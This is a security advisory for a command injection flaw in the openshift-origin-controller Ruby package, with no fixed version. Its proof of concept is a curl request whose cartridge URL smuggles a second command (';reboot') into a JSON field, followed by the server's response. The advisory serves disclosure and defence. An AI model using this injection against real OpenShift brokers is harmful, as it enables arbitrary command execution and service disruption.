Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Affecting openshift-origin-controller package, versions >=0.0.0
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.37% (74th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-RUBY-OPENSHIFTORIGINCONTROLLER-5862955
- published 29 Aug 2023
- disclosed 5 May 2022
- credit Jeremy Choi
How to fix?
There is no fixed version for openshift-origin-controller.
Overview
openshift-origin-controller is a The OpenShift Origin Controller is a Rails plugin which provides the models and controllers which implement the application and user management functionality and provides a REST API.
Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') through the API component. An attacker can perform command injection by creating applications via the cartridge_cache.rb URI.prase().
PoC
$ curl -k -s -H "Content-Type: application/json" -u jechoi:pw https://ec2-54-224-22-184.compute-1.amazonaws.com/broker/rest/domains/domtest/applications -X POST -d '{"name":"app4","cartridge":{"url":"http://poc.com/;reboot"}}'
{"data":null,"errors":{},"messages":[{"exit_code":109,"field":null,"severity":"error","text":"Invalid cartridge, error downloading from url 'http://poc.com/;reboot' "}],"status":"unprocessable_entity","supported_api_versions":[1.0,1.1,1.2,1.3,1.4],"type":null,"version":"1.4"}
References
CVSS Scores
version 3.1